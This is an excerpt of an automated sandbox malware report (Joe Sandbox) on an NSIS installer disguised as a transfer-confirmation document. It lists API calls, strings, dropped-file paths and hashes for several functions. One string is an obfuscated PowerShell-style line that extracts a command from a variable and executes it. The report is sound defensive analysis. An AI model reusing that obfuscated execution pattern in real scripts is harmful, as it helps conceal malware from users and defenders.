Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID: {
API String ID: 4154960007-366298937
Opcode ID: f3fca72fe88596ceb2a1dc6132db26d4a0074a2eaed671f798e7e9429c30ec02
Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
Opcode Fuzzy Hash: f3fca72fe88596ceb2a1dc6132db26d4a0074a2eaed671f798e7e9429c30ec02
Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69

Function 00405F0A Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,Completed,?,004051C9,Completed,00000000,00000000,00000000), ref: 00405FCD
GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 0040604B
GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 0040605E
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 004060A8
CoTaskMemFree.OLE32(?), ref: 004060B3
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004051C9,Completed,00000000,00000000,00000000), ref: 00406131

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406019
Completed, xrefs: 00405F2F
: Completed, xrefs: 00405F34, 00406014, 00406035, 0040604A, 0040605D, 00406079, 004060A4, 004060D6, 004060DC, 004060F6, 0040610A, 0040612A, 00406130, 0040613C, 0040616F
';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) ", xrefs: 00406104
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004060D1

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: ';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) "$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-3768624827
Opcode ID: 767b1783d20f48028c3daf2e5817f9a09796155ef10d83a1b14549b8d5aa00da
Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
Opcode Fuzzy Hash: 767b1783d20f48028c3daf2e5817f9a09796155ef10d83a1b14549b8d5aa00da
Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E

Function 00405770 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe"), ref: 00405799
lstrcatW.KERNEL32(004246D8,\*.*), ref: 004057E1
lstrcatW.KERNEL32(?,00409014), ref: 00405804
lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe"), ref: 0040580A
FindFirstFileW.KERNELBASE(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe"), ref: 0040581A
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
FindClose.KERNEL32(00000000), ref: 004058C9

Strings

\*.*, xrefs: 004057DB
"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe", xrefs: 00405779
C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040577E

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
API String ID: 2035342205-596837719
Opcode ID: 75d2b363e8663622168b21bd6825bb858b54638de43af0c3db2919d8f48e60de
Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
Opcode Fuzzy Hash: 75d2b363e8663622168b21bd6825bb858b54638de43af0c3db2919d8f48e60de
Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E

Function 0040653D Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
Instruction ID: 813cf183cee5dec966489ce4b0e77547af2495df81e7d873cacca3ac907c1fa9
Opcode Fuzzy Hash: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
Instruction Fuzzy Hash: 95F18770D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44

Function 0040622B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,771B2EE0,00405790,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0), ref: 00406236
FindClose.KERNEL32(00000000), ref: 00406242

Strings

WB, xrefs: 0040622C

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: WB
API String ID: 2295610775-2854515933
Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD

Function 00406252 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
GetProcAddress.KERNEL32(00000000,?), ref: 00406280

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
Instruction ID: 168f21105135a374c063cbb502f6419b25eb399c8ec2d40735489a78174e37d1
Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
Instruction Fuzzy Hash: 6FE0CD36E08120BBC7115B309D44D6773BC9FD9741305043DF505F6240C774AC1297E9

Function 004038B2 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280

lstrcatW.KERNEL32(1033,004226D0), ref: 00403933
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user~1\AppData\Local\Temp\), ref: 004039B3
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
GetFileAttributesW.KERNEL32(: Completed), ref: 004039D1
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes), ref: 00403A1A

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

RegisterClassW.USER32(00428180), ref: 00403A57
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
ShowWindow.USER32(00000005,00000000), ref: 00403ADA
LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AEB
LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
RegisterClassW.USER32(00428180), ref: 00403B1C
DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B

Strings

RichEdit20W, xrefs: 00403AFE, 00403B04
_Nb, xrefs: 00403A36, 00403A9E
RichEd20, xrefs: 00403AE6
.exe, xrefs: 004039C0
RichEdit, xrefs: 00403B0D
: Completed, xrefs: 0040397A, 00403983, 00403991, 004039E0, 004039E6
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004038BE
1033, xrefs: 004038D2, 0040392E
C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes, xrefs: 00403942, 0040394A, 004039ED, 004039F3, 00403A03
RichEd32, xrefs: 00403AF1
Control Panel\Desktop\ResourceLocale, xrefs: 004038E6
"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe", xrefs: 004038B5
.DEFAULT\Control Panel\International, xrefs: 0040391E

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 914957316-3002412492
Opcode ID: 944dc6c03719ae45e44b3d46cd84eabff06a9ed2df0d9f5219aeaae38ab8ce66
Instruction ID: 7b2c8f7aec5f024c70211f55c02b660a410cf4becd836ab4c66ac285f40ceed6
Opcode Fuzzy Hash: 944dc6c03719ae45e44b3d46cd84eabff06a9ed2df0d9f5219aeaae38ab8ce66
Instruction Fuzzy Hash: 5A61A470644201BAE320AF669C46F3B3A6CEB44749F40457FF941B62E2DB7C6902CA6D

Function 00403C55 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
ShowWindow.USER32(?), ref: 00403CAE
DestroyWindow.USER32 ref: 00403CC2
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
GetDlgItem.USER32(?,?), ref: 00403CFF
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
IsWindowEnabled.USER32(00000000), ref: 00403D1A
GetDlgItem.USER32(?,00000001), ref: 00403DC8
GetDlgItem.USER32(?,00000002), ref: 00403DD2
SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3D
GetDlgItem.USER32(?,00000003), ref: 00403EE3
ShowWindow.USER32(00000000,?), ref: 00403F04
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F16
EnableWindow.USER32(?,?), ref: 00403F31
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F47
EnableMenuItem.USER32(00000000), ref: 00403F4E
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F66
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
ShowWindow.USER32(?,0000000A), ref: 004040EA

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 58ab62fde9f499ba62d07c3a6c70f2588c0a9981729e988da1906f3edcdd1a2b
Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
Opcode Fuzzy Hash: 58ab62fde9f499ba62d07c3a6c70f2588c0a9981729e988da1906f3edcdd1a2b
Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E

Function 00402DBA Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402DCE
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe,00000400), ref: 00402DEA

Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe,80000000,00000003), ref: 00405B58
Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe,C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe,80000000,00000003), ref: 00402E33
GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7A

Strings

Error launching installer, xrefs: 00402E0A
Inst, xrefs: 00402EA1
soft, xrefs: 00402EAA
Null, xrefs: 00402EB3
C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe, xrefs: 00402DD4, 00402DE3, 00402DF7, 00402E14
"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe", xrefs: 00402DC3
C:\Users\user\Desktop, xrefs: 00402E15, 00402E1A, 00402E20
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402DC7, 00402F92
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403011
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC3

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-3981451405
Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
Instruction ID: 1f6ec37bde34587697a274125597031aed9c17e441137146a4e3b0792cc80405
Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
Instruction Fuzzy Hash: 3761F431940205ABDB20EF65DD89AAE3BB8AB04355F20417BF600B32D1D7B89E41DB9C

Function 00401752 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 00401793
CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user~1\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac","C:\Users\user~1\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac",00000000,00000000,"C:\Users\user~1\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac",C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen,?,?,00000031), ref: 004017B8

Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5

Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Strings

"C:\Users\user~1\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac", xrefs: 00401770, 00401779, 00401786, 00401798, 004017A4, 004017DA, 004017F0, 0040180E, 0040184A, 004018CB, 004018D4, 004018DE, 004018E9
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor, xrefs: 00401818, 00401834
C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen, xrefs: 00401781

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
